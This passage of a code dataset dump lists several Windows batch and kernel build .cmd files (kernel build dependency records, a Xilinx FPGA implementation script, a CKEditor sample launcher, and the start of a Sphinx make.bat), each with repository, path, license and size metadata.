code
stringlengths 3
1.03M
| repo_name
stringlengths 5
84
| path
stringlengths 4
233
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 3
1.03M
|
---|---|---|---|---|---|
cmd_net/bluetooth_mgmt/built-in.o := /home/yyoung.kim/Toolchain/prebuilt/linux-x86/toolchain/arm-eabi-4.4.3/bin/arm-eabi-ld -EL -r -o net/bluetooth_mgmt/built-in.o net/bluetooth_mgmt/bluetooth.o net/bluetooth_mgmt/rfcomm/built-in.o net/bluetooth_mgmt/bnep/built-in.o net/bluetooth_mgmt/hidp/built-in.o
| PrestigeMod/SHW-M440S | net/bluetooth_mgmt/.built-in.o.cmd | bat | gpl-2.0 | 307 |
cmd_drivers/net/ethernet/neterion/built-in.o := rm -f drivers/net/ethernet/neterion/built-in.o; /home/flint/android/prebuilts/gcc/linux-x86/arm/arm-linux-androideabi-4.6/bin/arm-linux-androideabi-ar rcsD drivers/net/ethernet/neterion/built-in.o
| lindsaytheflint/stone | drivers/net/ethernet/neterion/.built-in.o.cmd | bat | gpl-2.0 | 246 |
cmd_drivers/usb/built-in.o := /home/lithium/CodeSourcery/Sourcery_G++_Lite/bin/arm-none-linux-gnueabi-ld -EL -r -o drivers/usb/built-in.o drivers/usb/core/built-in.o drivers/usb/host/built-in.o drivers/usb/storage/built-in.o drivers/usb/misc/built-in.o drivers/usb/musb/built-in.o drivers/usb/otg/built-in.o drivers/usb/gadget/built-in.o
| 0xD34D/kernel_amazon_tate | drivers/usb/.built-in.o.cmd | bat | gpl-2.0 | 343 |
:: (c) Copyright 2009 - 2010 Xilinx, Inc. All rights reserved.
::
:: This file contains confidential and proprietary information
:: of Xilinx, Inc. and is protected under U.S. and
:: international copyright and other intellectual property
:: laws.
::
:: DISCLAIMER
:: This disclaimer is not a license and does not grant any
:: rights to the materials distributed herewith. Except as
:: otherwise provided in a valid license issued to you by
:: Xilinx, and to the maximum extent permitted by applicable
:: law: (1) THESE MATERIALS ARE MADE AVAILABLE "AS IS" AND
:: WITH ALL FAULTS, AND XILINX HEREBY DISCLAIMS ALL WARRANTIES
:: AND CONDITIONS, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING
:: BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, NON-
:: INFRINGEMENT, OR FITNESS FOR ANY PARTICULAR PURPOSE; and
:: (2) Xilinx shall not be liable (whether in contract or tort,
:: including negligence, or under any other theory of
:: liability) for any loss or damage of any kind or nature
:: related to, arising under or in connection with these
:: materials, including for any direct, or any indirect,
:: special, incidental, or consequential loss or damage
:: (including loss of data, profits, goodwill, or any type of
:: loss or damage suffered as a result of any action brought
:: by a third party) even if such damage or loss was
:: reasonably foreseeable or Xilinx had been advised of the
:: possibility of the same.
::
:: CRITICAL APPLICATIONS
:: Xilinx products are not designed or intended to be fail-
:: safe, or for use in any application requiring fail-safe
:: performance, such as life-support or safety devices or
:: systems, Class III medical devices, nuclear facilities,
:: applications related to the deployment of airbags, or any
:: other applications that could lead to death, personal
:: injury, or severe property or environmental damage
:: (individually and collectively, "Critical
:: Applications"). Customer assumes the sole risk and
:: liability of any use of Xilinx products in Critical
:: Applications, subject only to applicable laws and
:: regulations governing limitations on product liability.
::
:: THIS COPYRIGHT NOTICE AND DISCLAIMER MUST BE RETAINED AS
:: PART OF THIS FILE AT ALL TIMES.
rem Clean up the results directory
rmdir /S /Q results
mkdir results
rem Synthesize the VHDL Wrapper Files
#Synthesize the Wrapper Files
echo 'Synthesizing example design with XST';
xst -ifn xst.scr
copy fifo_tx_exdes.ngc .\results\
rem Copy the netlist generated by Coregen
echo 'Copying files from the netlist directory to the results directory'
copy ..\..\fifo_tx.ngc results\
rem Copy the constraints files generated by Coregen
echo 'Copying files from constraints directory to results directory'
copy ..\example_design\fifo_tx_exdes.ucf results\
cd results
echo 'Running ngdbuild'
ngdbuild -p xc3s1600e-fg484-4 -sd ../../../ fifo_tx_exdes
echo 'Running map'
map fifo_tx_exdes -o mapped.ncd
echo 'Running par'
par mapped.ncd routed.ncd
echo 'Running trce'
trce -e 10 routed.ncd mapped.pcf -o routed
echo 'Running design through bitgen'
bitgen -w routed
echo 'Running netgen to create gate level Verilog model'
netgen -ofmt verilog -sim -tm fifo_tx_exdes -pcf mapped.pcf -w -sdf_anno false routed.ncd routed.v
| gigglesninja/digital-system-design | uart/ipcore_dir/fifo_tx/implement/implement.bat | bat | gpl-2.0 | 3,248 |
cmd_arch/arm/vfp/vfphw.o := /home/aashir/android/toolchain/linaro/bin/arm-eabi-gcc -Wp,-MD,arch/arm/vfp/.vfphw.o.d -nostdinc -isystem /home/aashir/android/toolchain/linaro/bin/../lib/gcc/arm-eabi/4.6.2/include -I/home/aashir/android/2012/arch/arm/include -Iarch/arm/include/generated -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-ux500/include -Iarch/arm/plat-nomadik/include -D__ASSEMBLY__ -mabi=aapcs-linux -mno-thumb-interwork -funwind-tables -D__LINUX_ARM_ARCH__=7 -march=armv7-a -include asm/unified.h -Wa,-mfpu=softvfp+vfp -c -o arch/arm/vfp/vfphw.o arch/arm/vfp/vfphw.S
source_arch/arm/vfp/vfphw.o := arch/arm/vfp/vfphw.S
deps_arch/arm/vfp/vfphw.o := \
$(wildcard include/config/smp.h) \
$(wildcard include/config/cpu/feroceon.h) \
$(wildcard include/config/preempt.h) \
$(wildcard include/config/thumb2/kernel.h) \
$(wildcard include/config/vfpv3.h) \
/home/aashir/android/2012/arch/arm/include/asm/unified.h \
$(wildcard include/config/arm/asm/unified.h) \
/home/aashir/android/2012/arch/arm/include/asm/thread_info.h \
$(wildcard include/config/arm/thumbee.h) \
include/linux/compiler.h \
$(wildcard include/config/sparse/rcu/pointer.h) \
$(wildcard include/config/trace/branch/profiling.h) \
$(wildcard include/config/profile/all/branches.h) \
$(wildcard include/config/enable/must/check.h) \
$(wildcard include/config/enable/warn/deprecated.h) \
/home/aashir/android/2012/arch/arm/include/asm/fpstate.h \
$(wildcard include/config/iwmmxt.h) \
/home/aashir/android/2012/arch/arm/include/asm/vfpmacros.h \
/home/aashir/android/2012/arch/arm/include/asm/hwcap.h \
/home/aashir/android/2012/arch/arm/include/asm/vfp.h \
arch/arm/vfp/../kernel/entry-header.S \
$(wildcard include/config/frame/pointer.h) \
$(wildcard include/config/alignment/trap.h) \
$(wildcard include/config/cpu/v6.h) \
$(wildcard include/config/cpu/32v6k.h) \
$(wildcard include/config/have/hw/breakpoint.h) \
include/linux/init.h \
$(wildcard include/config/modules.h) \
$(wildcard include/config/hotplug.h) \
include/linux/linkage.h \
/home/aashir/android/2012/arch/arm/include/asm/linkage.h \
/home/aashir/android/2012/arch/arm/include/asm/assembler.h \
$(wildcard include/config/trace/irqflags.h) \
/home/aashir/android/2012/arch/arm/include/asm/ptrace.h \
$(wildcard include/config/cpu/endian/be8.h) \
$(wildcard include/config/arm/thumb.h) \
/home/aashir/android/2012/arch/arm/include/asm/domain.h \
$(wildcard include/config/io/36.h) \
$(wildcard include/config/cpu/use/domains.h) \
/home/aashir/android/2012/arch/arm/include/asm/asm-offsets.h \
include/generated/asm-offsets.h \
/home/aashir/android/2012/arch/arm/include/asm/errno.h \
include/asm-generic/errno.h \
include/asm-generic/errno-base.h \
arch/arm/vfp/vfphw.o: $(deps_arch/arm/vfp/vfphw.o)
$(deps_arch/arm/vfp/vfphw.o):
| emwno/android_kernel_U8500 | arch/arm/vfp/.vfphw.o.cmd | bat | gpl-2.0 | 2,966 |
cmd_sound/pcmcia/built-in.o := ld -m elf_x86_64 -r -o sound/pcmcia/built-in.o sound/pcmcia/vx/built-in.o sound/pcmcia/pdaudiocf/built-in.o
| Existed/kernel-2.6.35.14 | sound/pcmcia/.built-in.o.cmd | bat | gpl-2.0 | 143 |
cmd_fs/quota/built-in.o := rm -f fs/quota/built-in.o; ccache /drive2/Android/CM9/prebuilt/linux-x86/toolchain/arm-eabi-4.4.3/bin/arm-eabi-ar rcs fs/quota/built-in.o
| tcp209/kernel_samsung_epic4gtouch | build/epic4gtouch/fs/quota/.built-in.o.cmd | bat | gpl-2.0 | 166 |
cmd_scripts/mod/mk_elfconfig := gcc -Wp,-MD,scripts/mod/.mk_elfconfig.d -O2 -I/home/shizhai/new_zhongwang/trunk/staging_dir/host/include -Wall -Wmissing-prototypes -Wstrict-prototypes -I/home/shizhai/new_zhongwang/trunk/staging_dir/host/include -I/home/shizhai/new_zhongwang/trunk/build_dir/target-mips_r2_uClibc-0.9.33.2/linux-ar71xx_generic/linux-3.10.4/tools/include -o scripts/mod/mk_elfconfig scripts/mod/mk_elfconfig.c
source_scripts/mod/mk_elfconfig := scripts/mod/mk_elfconfig.c
deps_scripts/mod/mk_elfconfig := \
/usr/include/stdio.h \
/usr/include/features.h \
/usr/include/i386-linux-gnu/bits/predefs.h \
/usr/include/i386-linux-gnu/sys/cdefs.h \
/usr/include/i386-linux-gnu/bits/wordsize.h \
/usr/include/i386-linux-gnu/gnu/stubs.h \
/usr/include/i386-linux-gnu/gnu/stubs-32.h \
/usr/lib/gcc/i686-linux-gnu/4.6/include/stddef.h \
/usr/include/i386-linux-gnu/bits/types.h \
/usr/include/i386-linux-gnu/bits/typesizes.h \
/usr/include/libio.h \
/usr/include/_G_config.h \
/usr/include/wchar.h \
/usr/lib/gcc/i686-linux-gnu/4.6/include/stdarg.h \
/usr/include/i386-linux-gnu/bits/stdio_lim.h \
/usr/include/i386-linux-gnu/bits/sys_errlist.h \
/usr/include/i386-linux-gnu/bits/stdio.h \
/usr/include/i386-linux-gnu/bits/stdio2.h \
/usr/include/stdlib.h \
/usr/include/i386-linux-gnu/bits/waitflags.h \
/usr/include/i386-linux-gnu/bits/waitstatus.h \
/home/shizhai/new_zhongwang/trunk/staging_dir/host/include/endian.h \
/home/shizhai/new_zhongwang/trunk/staging_dir/host/include/byteswap.h \
/usr/include/byteswap.h \
/usr/include/i386-linux-gnu/bits/byteswap.h \
/usr/include/endian.h \
/usr/include/i386-linux-gnu/bits/endian.h \
/usr/include/i386-linux-gnu/sys/types.h \
/usr/include/time.h \
/usr/include/i386-linux-gnu/sys/select.h \
/usr/include/i386-linux-gnu/bits/select.h \
/usr/include/i386-linux-gnu/bits/sigset.h \
/usr/include/i386-linux-gnu/bits/time.h \
/usr/include/i386-linux-gnu/bits/select2.h \
/home/shizhai/new_zhongwang/trunk/staging_dir/host/include/sys/sysmacros.h \
/usr/include/i386-linux-gnu/bits/pthreadtypes.h \
/usr/include/alloca.h \
/usr/include/i386-linux-gnu/bits/stdlib.h \
/usr/include/string.h \
/usr/include/xlocale.h \
/usr/include/i386-linux-gnu/bits/string.h \
/usr/include/i386-linux-gnu/bits/string2.h \
/usr/include/i386-linux-gnu/bits/string3.h \
/home/shizhai/new_zhongwang/trunk/staging_dir/host/include/elf.h \
/usr/lib/gcc/i686-linux-gnu/4.6/include/stdint.h \
/usr/include/stdint.h \
/usr/include/i386-linux-gnu/bits/wchar.h \
scripts/mod/mk_elfconfig: $(deps_scripts/mod/mk_elfconfig)
$(deps_scripts/mod/mk_elfconfig):
| shizhai/wprobe | build_dir/target-mips_r2_uClibc-0.9.33.2/linux-ar71xx_generic/linux-3.10.4/scripts/mod/.mk_elfconfig.cmd | bat | gpl-2.0 | 2,681 |
<<<<<<< HEAD
@ECHO OFF
::
:: Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved.
:: For licensing, see LICENSE.html or http://ckeditor.com/license
::
:: Use this file to quickly run the sample in a Windows environment.
::
adl application.xml ../../
=======
@ECHO OFF
::
:: Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved.
:: For licensing, see LICENSE.html or http://ckeditor.com/license
::
:: Use this file to quickly run the sample in a Windows environment.
::
adl application.xml ../../
>>>>>>> origin/dev
| spocode/Issue-Report | sites/all/libraries/ckeditor/_samples/adobeair/run.bat | bat | gpl-2.0 | 571 |
cmd_drivers/input/touchscreen/gt82x.ko := arm-linux-gnueabi-ld -EL -r -T /home/jixinhui/Projects/phoenix/lichee/linux-3.3/scripts/module-common.lds --build-id -o drivers/input/touchscreen/gt82x.ko drivers/input/touchscreen/gt82x.o drivers/input/touchscreen/gt82x.mod.o
| qubir/PhoenixA20_linux_sourcecode | drivers/input/touchscreen/.gt82x.ko.cmd | bat | gpl-2.0 | 271 |
cmd_fs/jbd/built-in.o := ../arm-fsl-linux-gnueabi/bin/arm-fsl-linux-gnueabi-ld -EL -r -o fs/jbd/built-in.o fs/jbd/jbd.o
| chrnueve/udooImaxdi | kernel_oficial_source/fs/jbd/.built-in.o.cmd | bat | gpl-2.0 | 125 |
cmd_net/ipv6/ipv6.mod.o := arm-none-linux-gnueabi-gcc -Wp,-MD,net/ipv6/.ipv6.mod.o.d -nostdinc -isystem /home/stesalit/arm-2009q1/bin/../lib/gcc/arm-none-linux-gnueabi/4.3.3/include -I/root/kernel-dev/linux-2.6.37/arch/arm/include -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-davinci/include -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Wno-format-security -fno-delete-null-pointer-checks -Os -marm -fno-omit-frame-pointer -mapcs -mno-sched-prolog -mabi=aapcs-linux -mno-thumb-interwork -D__LINUX_ARM_ARCH__=5 -march=armv5te -mtune=arm9tdmi -msoft-float -Uarm -fno-stack-protector -fno-omit-frame-pointer -fno-optimize-sibling-calls -Wdeclaration-after-statement -Wno-pointer-sign -fno-strict-overflow -D"KBUILD_STR(s)=\#s" -D"KBUILD_BASENAME=KBUILD_STR(ipv6.mod)" -D"KBUILD_MODNAME=KBUILD_STR(ipv6)" -DMODULE -c -o net/ipv6/ipv6.mod.o net/ipv6/ipv6.mod.c
deps_net/ipv6/ipv6.mod.o := \
net/ipv6/ipv6.mod.c \
$(wildcard include/config/module/unload.h) \
include/linux/module.h \
$(wildcard include/config/symbol/prefix.h) \
$(wildcard include/config/modules.h) \
$(wildcard include/config/modversions.h) \
$(wildcard include/config/unused/symbols.h) \
$(wildcard include/config/generic/bug.h) \
$(wildcard include/config/kallsyms.h) \
$(wildcard include/config/smp.h) \
$(wildcard include/config/tracepoints.h) \
$(wildcard include/config/tracing.h) \
$(wildcard include/config/event/tracing.h) \
$(wildcard include/config/ftrace/mcount/record.h) \
$(wildcard include/config/constructors.h) \
$(wildcard include/config/sysfs.h) \
include/linux/list.h \
$(wildcard include/config/debug/list.h) \
include/linux/types.h \
$(wildcard include/config/uid16.h) \
$(wildcard include/config/lbdaf.h) \
$(wildcard include/config/phys/addr/t/64bit.h) \
$(wildcard include/config/64bit.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/types.h \
include/asm-generic/int-ll64.h \
include/asm-generic/bitsperlong.h \
include/linux/posix_types.h \
include/linux/stddef.h \
include/linux/compiler.h \
$(wildcard include/config/sparse/rcu/pointer.h) \
$(wildcard include/config/trace/branch/profiling.h) \
$(wildcard include/config/profile/all/branches.h) \
$(wildcard include/config/enable/must/check.h) \
$(wildcard include/config/enable/warn/deprecated.h) \
include/linux/compiler-gcc.h \
$(wildcard include/config/arch/supports/optimized/inlining.h) \
$(wildcard include/config/optimize/inlining.h) \
include/linux/compiler-gcc4.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/posix_types.h \
include/linux/poison.h \
$(wildcard include/config/illegal/pointer/value.h) \
include/linux/prefetch.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/processor.h \
$(wildcard include/config/have/hw/breakpoint.h) \
$(wildcard include/config/mmu.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/hw_breakpoint.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/ptrace.h \
$(wildcard include/config/cpu/endian/be8.h) \
$(wildcard include/config/arm/thumb.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/hwcap.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/cache.h \
$(wildcard include/config/arm/l1/cache/shift.h) \
$(wildcard include/config/aeabi.h) \
include/linux/stat.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/stat.h \
include/linux/time.h \
$(wildcard include/config/arch/uses/gettimeoffset.h) \
include/linux/cache.h \
$(wildcard include/config/arch/has/cache/line/size.h) \
include/linux/kernel.h \
$(wildcard include/config/preempt/voluntary.h) \
$(wildcard include/config/debug/spinlock/sleep.h) \
$(wildcard include/config/prove/locking.h) \
$(wildcard include/config/ring/buffer.h) \
$(wildcard include/config/numa.h) \
/home/stesalit/arm-2009q1/bin/../lib/gcc/arm-none-linux-gnueabi/4.3.3/include/stdarg.h \
include/linux/linkage.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/linkage.h \
include/linux/bitops.h \
$(wildcard include/config/generic/find/last/bit.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/bitops.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/system.h \
$(wildcard include/config/cpu/xsc3.h) \
$(wildcard include/config/cpu/fa526.h) \
$(wildcard include/config/arch/has/barriers.h) \
$(wildcard include/config/arm/dma/mem/bufferable.h) \
$(wildcard include/config/cpu/sa1100.h) \
$(wildcard include/config/cpu/sa110.h) \
$(wildcard include/config/cpu/32v6k.h) \
include/linux/irqflags.h \
$(wildcard include/config/trace/irqflags.h) \
$(wildcard include/config/irqsoff/tracer.h) \
$(wildcard include/config/preempt/tracer.h) \
$(wildcard include/config/trace/irqflags/support.h) \
include/linux/typecheck.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/irqflags.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/outercache.h \
$(wildcard include/config/outer/cache/sync.h) \
$(wildcard include/config/outer/cache.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/memory.h \
$(wildcard include/config/page/offset.h) \
$(wildcard include/config/thumb2/kernel.h) \
$(wildcard include/config/highmem.h) \
$(wildcard include/config/dram/size.h) \
$(wildcard include/config/dram/base.h) \
$(wildcard include/config/have/tcm.h) \
$(wildcard include/config/zone/dma.h) \
include/linux/const.h \
arch/arm/mach-davinci/include/mach/memory.h \
$(wildcard include/config/arch/davinci/da8xx.h) \
$(wildcard include/config/arch/davinci/dmx.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/page.h \
$(wildcard include/config/cpu/copy/v3.h) \
$(wildcard include/config/cpu/copy/v4wt.h) \
$(wildcard include/config/cpu/copy/v4wb.h) \
$(wildcard include/config/cpu/copy/feroceon.h) \
$(wildcard include/config/cpu/copy/fa.h) \
$(wildcard include/config/cpu/xscale.h) \
$(wildcard include/config/cpu/copy/v6.h) \
$(wildcard include/config/sparsemem.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/glue.h \
$(wildcard include/config/cpu/arm610.h) \
$(wildcard include/config/cpu/arm710.h) \
$(wildcard include/config/cpu/abrt/lv4t.h) \
$(wildcard include/config/cpu/abrt/ev4.h) \
$(wildcard include/config/cpu/abrt/ev4t.h) \
$(wildcard include/config/cpu/abrt/ev5tj.h) \
$(wildcard include/config/cpu/abrt/ev5t.h) \
$(wildcard include/config/cpu/abrt/ev6.h) \
$(wildcard include/config/cpu/abrt/ev7.h) \
$(wildcard include/config/cpu/pabrt/legacy.h) \
$(wildcard include/config/cpu/pabrt/v6.h) \
$(wildcard include/config/cpu/pabrt/v7.h) \
include/asm-generic/getorder.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/sizes.h \
include/asm-generic/memory_model.h \
$(wildcard include/config/flatmem.h) \
$(wildcard include/config/discontigmem.h) \
$(wildcard include/config/sparsemem/vmemmap.h) \
include/asm-generic/cmpxchg-local.h \
include/asm-generic/cmpxchg.h \
include/asm-generic/bitops/non-atomic.h \
include/asm-generic/bitops/fls64.h \
include/asm-generic/bitops/sched.h \
include/asm-generic/bitops/hweight.h \
include/asm-generic/bitops/arch_hweight.h \
include/asm-generic/bitops/const_hweight.h \
include/asm-generic/bitops/lock.h \
include/linux/log2.h \
$(wildcard include/config/arch/has/ilog2/u32.h) \
$(wildcard include/config/arch/has/ilog2/u64.h) \
include/linux/printk.h \
$(wildcard include/config/printk.h) \
$(wildcard include/config/dynamic/debug.h) \
include/linux/dynamic_debug.h \
include/linux/jump_label.h \
$(wildcard include/config/jump/label.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/byteorder.h \
include/linux/byteorder/little_endian.h \
include/linux/swab.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/swab.h \
include/linux/byteorder/generic.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/bug.h \
$(wildcard include/config/bug.h) \
$(wildcard include/config/debug/bugverbose.h) \
include/asm-generic/bug.h \
$(wildcard include/config/generic/bug/relative/pointers.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/div64.h \
include/linux/seqlock.h \
include/linux/spinlock.h \
$(wildcard include/config/debug/spinlock.h) \
$(wildcard include/config/generic/lockbreak.h) \
$(wildcard include/config/preempt.h) \
$(wildcard include/config/debug/lock/alloc.h) \
include/linux/preempt.h \
$(wildcard include/config/debug/preempt.h) \
$(wildcard include/config/preempt/notifiers.h) \
include/linux/thread_info.h \
$(wildcard include/config/compat.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/thread_info.h \
$(wildcard include/config/arm/thumbee.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/fpstate.h \
$(wildcard include/config/vfpv3.h) \
$(wildcard include/config/iwmmxt.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/domain.h \
$(wildcard include/config/io/36.h) \
include/linux/stringify.h \
include/linux/bottom_half.h \
include/linux/spinlock_types.h \
include/linux/spinlock_types_up.h \
include/linux/lockdep.h \
$(wildcard include/config/lockdep.h) \
$(wildcard include/config/lock/stat.h) \
$(wildcard include/config/prove/rcu.h) \
include/linux/rwlock_types.h \
include/linux/spinlock_up.h \
include/linux/rwlock.h \
include/linux/spinlock_api_up.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/atomic.h \
$(wildcard include/config/generic/atomic64.h) \
include/asm-generic/atomic64.h \
include/asm-generic/atomic-long.h \
include/linux/math64.h \
include/linux/kmod.h \
include/linux/gfp.h \
$(wildcard include/config/kmemcheck.h) \
$(wildcard include/config/zone/dma32.h) \
$(wildcard include/config/debug/vm.h) \
include/linux/mmzone.h \
$(wildcard include/config/force/max/zoneorder.h) \
$(wildcard include/config/memory/hotplug.h) \
$(wildcard include/config/compaction.h) \
$(wildcard include/config/arch/populates/node/map.h) \
$(wildcard include/config/flat/node/mem/map.h) \
$(wildcard include/config/cgroup/mem/res/ctlr.h) \
$(wildcard include/config/no/bootmem.h) \
$(wildcard include/config/have/memory/present.h) \
$(wildcard include/config/have/memoryless/nodes.h) \
$(wildcard include/config/need/node/memmap/size.h) \
$(wildcard include/config/need/multiple/nodes.h) \
$(wildcard include/config/have/arch/early/pfn/to/nid.h) \
$(wildcard include/config/sparsemem/extreme.h) \
$(wildcard include/config/nodes/span/other/nodes.h) \
$(wildcard include/config/holes/in/zone.h) \
$(wildcard include/config/arch/has/holes/memorymodel.h) \
include/linux/wait.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/current.h \
include/linux/threads.h \
$(wildcard include/config/nr/cpus.h) \
$(wildcard include/config/base/small.h) \
include/linux/numa.h \
$(wildcard include/config/nodes/shift.h) \
include/linux/init.h \
$(wildcard include/config/hotplug.h) \
include/linux/nodemask.h \
include/linux/bitmap.h \
include/linux/string.h \
$(wildcard include/config/binary/printf.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/string.h \
include/linux/pageblock-flags.h \
$(wildcard include/config/hugetlb/page.h) \
$(wildcard include/config/hugetlb/page/size/variable.h) \
include/generated/bounds.h \
include/linux/memory_hotplug.h \
$(wildcard include/config/memory/hotremove.h) \
$(wildcard include/config/have/arch/nodedata/extension.h) \
include/linux/notifier.h \
include/linux/errno.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/errno.h \
include/asm-generic/errno.h \
include/asm-generic/errno-base.h \
include/linux/mutex.h \
$(wildcard include/config/debug/mutexes.h) \
include/linux/rwsem.h \
$(wildcard include/config/rwsem/generic/spinlock.h) \
include/linux/rwsem-spinlock.h \
include/linux/srcu.h \
include/linux/topology.h \
$(wildcard include/config/sched/smt.h) \
$(wildcard include/config/sched/mc.h) \
$(wildcard include/config/sched/book.h) \
$(wildcard include/config/use/percpu/numa/node/id.h) \
include/linux/cpumask.h \
$(wildcard include/config/cpumask/offstack.h) \
$(wildcard include/config/hotplug/cpu.h) \
$(wildcard include/config/debug/per/cpu/maps.h) \
$(wildcard include/config/disable/obsolete/cpumask/functions.h) \
include/linux/smp.h \
$(wildcard include/config/use/generic/smp/helpers.h) \
include/linux/percpu.h \
$(wildcard include/config/need/per/cpu/embed/first/chunk.h) \
$(wildcard include/config/need/per/cpu/page/first/chunk.h) \
$(wildcard include/config/have/setup/per/cpu/area.h) \
include/linux/pfn.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/percpu.h \
include/asm-generic/percpu.h \
include/linux/percpu-defs.h \
$(wildcard include/config/debug/force/weak/per/cpu.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/topology.h \
include/asm-generic/topology.h \
include/linux/mmdebug.h \
$(wildcard include/config/debug/virtual.h) \
include/linux/workqueue.h \
$(wildcard include/config/debug/objects/work.h) \
$(wildcard include/config/freezer.h) \
include/linux/timer.h \
$(wildcard include/config/timer/stats.h) \
$(wildcard include/config/debug/objects/timers.h) \
include/linux/ktime.h \
$(wildcard include/config/ktime/scalar.h) \
include/linux/jiffies.h \
include/linux/timex.h \
include/linux/param.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/param.h \
$(wildcard include/config/hz.h) \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/timex.h \
arch/arm/mach-davinci/include/mach/timex.h \
include/linux/debugobjects.h \
$(wildcard include/config/debug/objects.h) \
$(wildcard include/config/debug/objects/free.h) \
include/linux/elf.h \
include/linux/elf-em.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/elf.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/user.h \
include/linux/kobject.h \
include/linux/sysfs.h \
include/linux/kobject_ns.h \
include/linux/kref.h \
include/linux/moduleparam.h \
$(wildcard include/config/alpha.h) \
$(wildcard include/config/ia64.h) \
$(wildcard include/config/ppc64.h) \
include/linux/tracepoint.h \
include/linux/rcupdate.h \
$(wildcard include/config/rcu/torture/test.h) \
$(wildcard include/config/preempt/rcu.h) \
$(wildcard include/config/no/hz.h) \
$(wildcard include/config/tree/rcu.h) \
$(wildcard include/config/tree/preempt/rcu.h) \
$(wildcard include/config/tiny/rcu.h) \
$(wildcard include/config/tiny/preempt/rcu.h) \
$(wildcard include/config/debug/objects/rcu/head.h) \
$(wildcard include/config/preempt/rt.h) \
include/linux/completion.h \
include/linux/rcutree.h \
/root/kernel-dev/linux-2.6.37/arch/arm/include/asm/module.h \
$(wildcard include/config/arm/unwind.h) \
include/trace/events/module.h \
include/trace/define_trace.h \
include/linux/vermagic.h \
include/generated/utsrelease.h \
net/ipv6/ipv6.mod.o: $(deps_net/ipv6/ipv6.mod.o)
$(deps_net/ipv6/ipv6.mod.o):
| srinugnt2000/linux-2.6.37 | net/ipv6/.ipv6.mod.o.cmd | bat | gpl-2.0 | 15,507 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% source
set I18NSPHINXOPTS=%SPHINXOPTS% source
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18NSPHINXOPTS=-D latex_paper_size=%PAPER% %I18NSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^<target^>` where ^<target^> is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. texinfo to make Texinfo files
echo. gettext to make PO message catalogs
echo. changes to make an overview over all changed/added/deprecated items
echo. xml to make Docutils-native XML files
echo. pseudoxml to make pseudoxml-XML files for display purposes
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
echo. coverage to run coverage check of the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
REM Check if sphinx-build is available and fallback to Python version if any
%SPHINXBUILD% 2> nul
if errorlevel 9009 goto sphinx_python
goto sphinx_ok
:sphinx_python
set SPHINXBUILD=python -m sphinx.__init__
%SPHINXBUILD% 2> nul
if errorlevel 9009 (
echo.
echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
echo.installed, then set the SPHINXBUILD environment variable to point
echo.to the full path of the 'sphinx-build' executable. Alternatively you
echo.may add the Sphinx directory to PATH.
echo.
echo.If you don't have Sphinx installed, grab it from
echo.http://sphinx-doc.org/
exit /b 1
)
:sphinx_ok
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
